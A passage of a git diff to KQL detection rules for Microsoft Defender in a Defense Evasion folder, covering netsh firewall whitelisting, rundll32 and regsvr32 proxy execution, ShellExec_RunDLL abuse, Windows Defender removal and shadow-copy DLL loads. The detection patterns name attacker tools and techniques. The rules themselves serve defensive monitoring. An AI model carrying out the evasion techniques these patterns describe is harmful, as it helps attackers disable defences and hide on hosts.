it. + +DeviceFileEvents | where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql b/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql index 44f055b4..fd3524e4 100644 --- a/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE -// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -// Date: 2020-05-25 -// Level: high -// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 - -DeviceProcessEvents +// Title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE +// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2020-05-25 +// Level: high +// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceProcessEvents | where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql b/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql index e564fb1c..1ec6834d 100644 --- a/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql +++ b/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Provlaunch.EXE Child Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-08 -// Level: high -// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Suspicious Provlaunch.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-08 +// Level: high +// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql b/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql index c2b341e2..c1b2a5d7 100644 --- a/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql +++ b/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql @@ -1,12 +1,12 @@ -// Title: Suspicious RASdial Activity -// Author: juju4 -// Date: 2019-01-16 -// Level: medium -// Description: Detects suspicious process related to rasdial.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Suspicious RASdial Activity +// Author: juju4 +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious process related to rasdial.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where FolderPath endswith "rasdial.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql b/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql index 7a9488ad..81a23a9c 100644 --- a/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql +++ b/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Recursive Takeown -// Author: frack113 -// Date: 2022-01-30 -// Level: medium -// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1222.001 -// False Positives: -// - Scripts created by developers and admins -// - Administrative activity - -DeviceProcessEvents +// Title: Suspicious Recursive Takeown +// Author: frack113 +// Date: 2022-01-30 +// Level: medium +// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.001 +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql b/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql index 06baeb9e..0e32de9b 100644 --- a/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql +++ b/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Regsvr32 Execution From Remote Share -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-31 -// Level: high -// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 - -DeviceProcessEvents +// Title: Suspicious Regsvr32 Execution From Remote Share +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-31 +// Level: high +// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 + +DeviceProcessEvents | where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql index 32519eac..9d59bb0c 100644 --- a/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Response File Execution Via Odbcconf.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-22 -// Level: high -// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious Response File Execution Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: high +// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql index aff33994..ca52bdec 100644 --- a/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Rundll32 Activity Invoking Sys File -// Author: Florian Roth (Nextron Systems) -// Date: 2021-03-05 -// Level: high -// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: Suspicious Rundll32 Activity Invoking Sys File +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql index e45820a0..48fbf13d 100644 --- a/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Rundll32 Execution With Image Extension -// Author: Hieu Tran -// Date: 2023-03-13 -// Level: high -// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: Suspicious Rundll32 Execution With Image Extension +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: high +// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql index 880bdc77..005aff3c 100644 --- a/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Rundll32 Setupapi.dll Activity -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020-10-07 -// Level: medium -// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 -// False Positives: -// - Scripts and administrative tools that use INF files for driver installation with setupapi.dll - -DeviceProcessEvents +// Title: Suspicious Rundll32 Setupapi.dll Activity +// Author: Konstantin Grishchenko, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Scripts and administrative tools that use INF files for driver installation with setupapi.dll + +DeviceProcessEvents | where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql b/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql index 03b9b02d..57d3591f 100644 --- a/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql +++ b/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Service Binary Directory -// Author: Florian Roth (Nextron Systems) -// Date: 2021-03-09 -// Level: high -// Description: Detects a service binary running in a suspicious directory -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Suspicious Service Binary Directory +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-09 +// Level: high +// Description: Detects a service binary running in a suspicious directory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_service_installed.kql b/KQL/rules/Defense Evasion/suspicious_service_installed.kql index 12a796f6..d7f7bd5b 100644 --- a/KQL/rules/Defense Evasion/suspicious_service_installed.kql +++ b/KQL/rules/Defense Evasion/suspicious_service_installed.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Service Installed -// Author: xknow (@xknow_infosec), xorxes (@xor_xes) -// Date: 2019-04-08 -// Level: medium -// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. -// Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) -// MITRE Tactic: Defense Evasion -// Tags: attack.t1562.001, attack.defense-evasion -// False Positives: -// - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it. - -DeviceRegistryEvents +// Title: Suspicious Service Installed +// Author: xknow (@xknow_infosec), xorxes (@xor_xes) +// Date: 2019-04-08 +// Level: medium +// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. +// Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) +// MITRE Tactic: Defense Evasion +// Tags: attack.t1562.001, attack.defense-evasion +// False Positives: +// - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it. + +DeviceRegistryEvents | where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql index a7fe1b13..bfff2e09 100644 --- a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql +++ b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql @@ -1,11 +1,11 @@ -// Title: Suspicious ShellExec_RunDLL Call Via Ordinal -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-12-01 -// Level: high -// Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. -// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: Suspicious ShellExec_RunDLL Call Via Ordinal +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-12-01 +// Level: high +// Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. +// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where (InitiatingProcessCommandLine contains "SHELL32.DLL" and (InitiatingProcessCommandLine contains "#568" or InitiatingProcessCommandLine contains "#570" or InitiatingProcessCommandLine contains "#572" or InitiatingProcessCommandLine contains "#576")) and ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "comspec" or InitiatingProcessCommandLine contains "iex" or InitiatingProcessCommandLine contains "Invoke-" or InitiatingProcessCommandLine contains "msiexec" or InitiatingProcessCommandLine contains "odbcconf" or InitiatingProcessCommandLine contains "regsvr32") or (InitiatingProcessCommandLine contains "\\Desktop\\" or InitiatingProcessCommandLine contains "\\ProgramData\\" or InitiatingProcessCommandLine contains "\\Temp\\" or InitiatingProcessCommandLine contains "\\Users\\Public\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql index 0e879f4f..1c1335e8 100644 --- a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql +++ b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Speech Runtime Binary Child Process -// Author: andrewdanis -// Date: 2025-10-23 -// Level: high -// Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes. -// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218 -// False Positives: -// - Unlikely. - -DeviceProcessEvents +// Title: Suspicious Speech Runtime Binary Child Process +// Author: andrewdanis +// Date: 2025-10-23 +// Level: high +// Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes. +// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218 +// False Positives: +// - Unlikely. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\SpeechRuntime.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql b/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql index 1050b6ad..a22c6dfa 100644 --- a/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql +++ b/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Splwow64 Without Params -// Author: Florian Roth (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects suspicious Splwow64.exe process without any command line parameters -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Suspicious Splwow64 Without Params +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects suspicious Splwow64.exe process without any command line parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql index 0bc2610c..2e9d881e 100644 --- a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql +++ b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Uninstall of Windows Defender Feature via PowerShell -// Author: yxinmiracle -// Date: 2025-08-22 -// Level: high -// Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceProcessEvents +// Title: Suspicious Uninstall of Windows Defender Feature via PowerShell +// Author: yxinmiracle +// Date: 2025-08-22 +// Level: high +// Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents | where ProcessCommandLine contains "Windows-Defender" and (ProcessCommandLine contains "Uninstall-WindowsFeature" or ProcessCommandLine contains "Remove-WindowsFeature") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql b/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql index 8ef21a2e..e2315f37 100644 --- a/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql +++ b/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Usage Of ShellExec_RunDLL -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-01 -// Level: high -// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious Usage Of ShellExec_RunDLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "comspec" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "regsvr32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql index 9f4eb0a1..8852defd 100644 --- a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql +++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Volume Shadow Copy VSS_PS.dll Load -// Author: Markus Neis, @markus_neis -// Date: 2021-07-07 -// Level: high -// Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. -// It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts. -// The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1490 - -DeviceImageLoadEvents +// Title: Suspicious Volume Shadow Copy VSS_PS.dll Load +// Author: Markus Neis, @markus_neis +// Date: 2021-07-07 +// Level: high +// Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. +// It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts. +// The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents | where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\vssadmin.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git 